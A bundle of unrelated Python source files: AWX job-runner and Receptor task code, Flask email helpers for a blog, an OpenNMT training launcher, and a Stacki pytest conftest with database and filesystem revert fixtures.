if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occurred while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
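# --- Illustrative sketch, not used by the task classes ---
# get_password_prompts() returns a mapping of prompt regex -> password name; the runner layer
# matches interactive output against each pattern and answers with the corresponding secret from
# build_passwords(). The helper below shows that lookup in isolation; the prompt text and the
# passwords dict passed in are hypothetical.
def _answer_for_prompt(prompt_line, prompt_map, passwords):
    import re  # harmless if the module already imports re
    for pattern, password_name in prompt_map.items():
        # Entries mapped to an empty name (e.g. "Bad passphrase") are deliberately not answered
        if password_name and re.search(pattern, prompt_line):
            return passwords.get(password_name)
    return None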
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it in a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
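# --- Illustrative sketch of how TransmitterThread is meant to be used (mirrors _run_internal below) ---
# Exceptions raised inside the thread are captured in .exc as (type, value, traceback) and can be
# re-raised in the caller with the original traceback preserved. The worker callable is hypothetical.
def _run_in_transmitter_thread(worker, *args):
    thread = TransmitterThread(target=worker, args=args)
    thread.start()
    thread.join()
    if thread.exc:
        exc_type, exc_value, exc_tb = thread.exc
        raise exc_value.with_traceback(exc_tb)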
class AWXReceptorJob:
def __init__(self, task, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params.update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = get_receptor_ctl()
res = None
try:
res = self._run_internal(receptor_ctl)
return res
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
# If an error occurred without the job itself failing, it could be a broken instance
if self.work_type == 'ansible-runner' and ((res is None) or (getattr(res, 'rc', None) is None)):
execution_node_health_check(self.task.instance.execution_node)
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
_kw = {}
if self.work_type == 'ansible-runner':
_kw['node'] = self.task.instance.execution_node
use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
_kw['tlsclient'] = get_tls_client(use_stream_tls)
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, signwork=True, **_kw)
self.unit_id = result['unitid']
self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# which exits if the job has finished normally. The context manager ensures we do not
# leave any threads lying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
detail = unit_status['Detail']
state_name = unit_status['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occurred at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
if not self.task.instance.result_traceback:
try:
resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
lines = resultsock.readlines()
self.task.instance.result_traceback = b"".join(lines).decode()
self.task.instance.save(update_fields=['result_traceback'])
except Exception:
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
self.runner_params['only_transmit_kwargs'] = True
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
if self.work_type == 'ansible-runner':
# on execution nodes, we rely on the private data dir being deleted
cli_params = f"--private-data-dir={private_data_dir} --delete"
else:
# on hybrid nodes, we rely on the private data dir NOT being deleted
cli_params = f"--private-data-dir={private_data_dir}"
receptor_params = {"params": cli_params}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
return 'kubernetes-runtime-auth'
return 'kubernetes-incluster-auth'
if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
return 'local'
return 'ansible-runner'
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
time.sleep(1)
@property
def pod_definition(self):
ee = self.task.instance.execution_environment
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
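# --- Illustrative sketch, standalone and never invoked by AWXReceptorJob ---
# This is the socketpair hand-off pattern used above: a background thread writes the payload into
# one end of the pair while the caller reads from the other end, and the writer must shut down its
# side or the reader's read() would block forever. The payload below is a hypothetical byte string;
# in AWXReceptorJob the writer is ansible-runner's "transmit" streamer and the reader is Receptor.
def _socketpair_handoff_demo(payload=b"example payload"):
    import socket
    import threading

    sockin, sockout = socket.socketpair()

    def _writer():
        try:
            with sockin.makefile('wb') as out:
                out.write(payload)
        finally:
            # Mirrors the finally block in AWXReceptorJob.transmit(): signal EOF to the reader
            sockin.shutdown(socket.SHUT_WR)

    writer = threading.Thread(target=_writer)
    writer.start()
    with sockout.makefile('rb') as fin:
        received = fin.read()  # returns once the writer shuts down its side
    writer.join()
    sockin.close()
    sockout.close()
    return received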
|
emails.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author:Administrator
@file: emails.py
@time: 2019/05/25
@software: PyCharm
@detail: notification email helpers
"""
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from flask_babel import _
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_async_mail(subject, to, html):
"""发送异步邮件"""
# Get the real application object behind the current_app proxy
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_async_mail(subject=_('New comment'),
to=current_app.config['BLUELOG_ADMIN_EMAIL'],
html=_("""
<p>New comment in post <i>%(title)s</i>, click the link below to check:</p>
<p><a href="%(url)s">%(url)s</a></p>
<p><small style="color: #868e96">Do not reply this email.</small></p>
""", title=post.title, url=post_url )
)
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_async_mail(subject=_('New reply'),
to=comment.email,
html=_("""
<p>New reply for the comment you left in post
<i>%(title)s</i>, click the link below to check:
</p>
<p><a href="%(url)s">%(url)s</a></p>
<p><small style="color: #868e96">Do not reply this email.</small></p>
""", title=comment.post.title, url=post_url)
)
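# --- Illustrative sketch, not part of the blueprint above ---
# send_async_mail() returns the worker Thread, so a caller that must be sure the message was handed
# to Flask-Mail (for example in a test) can join it. It has to run inside an active application
# context, because send_async_mail dereferences current_app. The recipient address is hypothetical.
def send_test_mail_and_wait():
    thr = send_async_mail(subject='Test mail',
                          to='admin@example.com',
                          html='<p>Hello from the mail helper.</p>')
    thr.join()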
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
import configargparse
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.logging import logger
from onmt.train_single import main as single_main
def main(opt):
if opt.rnn_type == "SRU" and not opt.gpu_ranks:
raise AssertionError("Using SRU requires -gpu_ranks set.")
if opt.epochs:
raise AssertionError("-epochs is deprecated please use -train_steps.")
if opt.truncated_decoder > 0 and opt.accum_count > 1:
raise AssertionError("BPTT is not compatible with -accum > 1")
if opt.gpuid:
raise AssertionError(
"gpuid is deprecated \
see world_size and gpu_ranks"
)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
mp = torch.multiprocessing.get_context("spawn")
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
procs.append(
mp.Process(
target=run,
args=(
opt,
device_id,
error_queue,
),
daemon=True,
)
)
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
for p in procs:
p.join()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def run(opt, device_id, error_queue):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError(
"An error occurred in \
Distributed initialization"
)
single_main(opt, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
if __name__ == "__main__":
parser = configargparse.ArgumentParser(
description="train.py",
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter,
)
opts.config_opts(parser)
opts.add_md_help_argument(parser)
opts.model_opts(parser)
opts.train_opts(parser)
opt = parser.parse_args()
main(opt)
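# --- Illustrative sketch, never called by the entry point above ---
# This is the error-queue pattern ErrorHandler relies on, reduced to its core: a child process
# pushes (rank, traceback) onto a shared SimpleQueue instead of dying silently, and the parent
# inspects the queue after join() and re-raises. The failing worker is hypothetical.
def _demo_worker(rank, queue):
    import traceback
    try:
        raise RuntimeError("worker %d failed" % rank)
    except Exception:
        queue.put((rank, traceback.format_exc()))


def _error_queue_demo():
    ctx = torch.multiprocessing.get_context("spawn")
    error_queue = ctx.SimpleQueue()
    proc = ctx.Process(target=_demo_worker, args=(0, error_queue), daemon=True)
    proc.start()
    proc.join()
    if not error_queue.empty():
        rank, original_trace = error_queue.get()
        raise Exception("Worker %d failed:\n%s" % (rank, original_trace))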
|
conftest.py
|
import gc
from http.server import HTTPServer, SimpleHTTPRequestHandler
import json
import multiprocessing
import os
import random
import shutil
import signal
import subprocess
import tempfile
import time
import warnings
from django.core.servers import basehttp
from django.core.wsgi import get_wsgi_application
import pytest
@pytest.fixture(scope="session")
def dump_mysql():
# Create a temp file and open it for the subprocess command
file_fd, file_path = tempfile.mkstemp(suffix=".sql")
file_obj = os.fdopen(file_fd, mode="w")
# Dump the initial Stacki DB into an SQL file, to restore from
# after each test
if os.path.exists("/opt/stack/etc/root.my.cnf"):
subprocess.run([
"mysqldump",
"--defaults-file=/opt/stack/etc/root.my.cnf",
"--lock-all-tables",
"--add-drop-database",
"--databases",
"cluster"
], stdout=file_obj, check=True)
else:
subprocess.run([
"mysqldump",
"--lock-all-tables",
"--add-drop-database",
"--databases",
"cluster"
], stdout=file_obj, check=True)
# Close the file
file_obj.close()
# Done with the set up, yield our SQL file path
yield file_path
# Remove the SQL file
os.remove(file_path)
@pytest.fixture
def revert_database(dump_mysql):
# Don't need to do anything in the set up
yield
# Load a fresh database after each test
with open(dump_mysql) as sql:
if os.path.exists("/opt/stack/etc/root.my.cnf"):
subprocess.run([
"mysql",
"--defaults-file=/opt/stack/etc/root.my.cnf"
], stdin=sql, check=True)
else:
subprocess.run("mysql", stdin=sql, check=True)
@pytest.fixture
def revert_filesystem():
# The paths to capture and revert changes to
paths = (
"/etc",
"/export/stack",
"/tftpboot"
)
def clean_up():
# Unmount any existing overlay directories
with open("/proc/mounts", "r") as mounts:
# Create a tuple of lines because /proc/mounts will change
# as we unmount things
for mount in tuple(mounts):
if mount.startswith("overlay_"):
# Try three times to unmount the overlay
for attempt in range(1, 4):
try:
subprocess.run(
["umount", mount.split()[0]],
check=True
)
# It succeeded
break
except subprocess.CalledProcessError:
# Let's run sync to see if it helps
subprocess.run(["sync"])
# Run the garbage collector, just in case it releases
# some opened file handles
gc.collect()
if attempt < 3:
# Sleep for a few seconds to give the open file
# handles a chance to clean themselves up
time.sleep(3)
else:
# Let's dump out any suspects.
result = subprocess.run(
["lsof", "-x", "+D", mount.split()[1]],
stdout=subprocess.PIPE,
encoding='utf-8'
)
warnings.warn('Unable to unmount {} mounted on {}\n\n{}'.format(
mount.split()[0],
mount.split()[1],
result.stdout
))
# We couldn't unmount the overlay, abort the tests
pytest.exit("Couldn't unmount overlay on {}".format(mount.split()[1]))
# Make sure the overlay root is clean
if os.path.exists("/overlay"):
shutil.rmtree("/overlay")
# Make sure we are clean
clean_up()
# Now set up the overlays
for ndx, path in enumerate(paths):
# Make the overlay directories
overlay_dirs = {
"lowerdir": path,
"upperdir": os.path.join("/overlay", path[1:], "upper"),
"workdir": os.path.join("/overlay", path[1:], "work")
}
os.makedirs(overlay_dirs['upperdir'])
os.makedirs(overlay_dirs['workdir'])
# Mount the overlays
subprocess.run([
"mount",
"-t", "overlay",
f"overlay_{ndx}",
"-o", ",".join(f"{k}={v}" for k, v in overlay_dirs.items()),
path
], check=True)
yield
# Clean up after the test
clean_up()
@pytest.fixture
def revert_discovery():
# Nothing to do in set up
yield
# Make sure discovery is turned off, in case a test failed. We get
# four tries to actually shut down the daemon
for _ in range(4):
result = subprocess.run(
["stack", "disable", "discovery"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
# Make sure we were actually able to shut down any daemons.
if result.returncode == 0 and "Warning:" not in result.stdout:
break
else:
# Fail the test if the daemon isn't behaving
pytest.fail("Couldn't shut down discovery daemon")
# Blow away the log file
if os.path.exists("/var/log/stack-discovery.log"):
os.remove("/var/log/stack-discovery.log")
@pytest.fixture
def revert_routing_table():
# Get a snapshot of the existing routes
result = subprocess.run(
["ip", "route", "list"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
old_routes = { line.strip() for line in result.stdout.split('\n') if line }
yield
# Get a new view of the routing table
result = subprocess.run(
["ip", "route", "list"],
stdout=subprocess.PIPE,
encoding="utf-8",
check=True
)
new_routes = { line.strip() for line in result.stdout.split('\n') if line }
# Remove any new routes
for route in new_routes:
if route not in old_routes:
result = subprocess.run(f"ip route del {route}", shell=True)
# Add in any missing old routes
for route in old_routes:
if route not in new_routes:
result = subprocess.run(f"ip route add {route}", shell=True)
@pytest.fixture
def add_host():
def _inner(hostname, rack, rank, appliance):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
# First use of the fixture adds backend-0-0
_inner('backend-0-0', '0', '0', 'backend')
# Then return the inner function, so we can call it inside the test
# to get more hosts added
return _inner
@pytest.fixture
def add_host_with_interface():
def _inner(hostname, rack, rank, appliance, interface):
cmd = f'stack add host {hostname} rack={rack} rank={rank} appliance={appliance}'
result = subprocess.run(cmd.split())
if result.returncode != 0:
pytest.fail('unable to add a dummy host')
cmd = f'stack add host interface {hostname} interface={interface}'
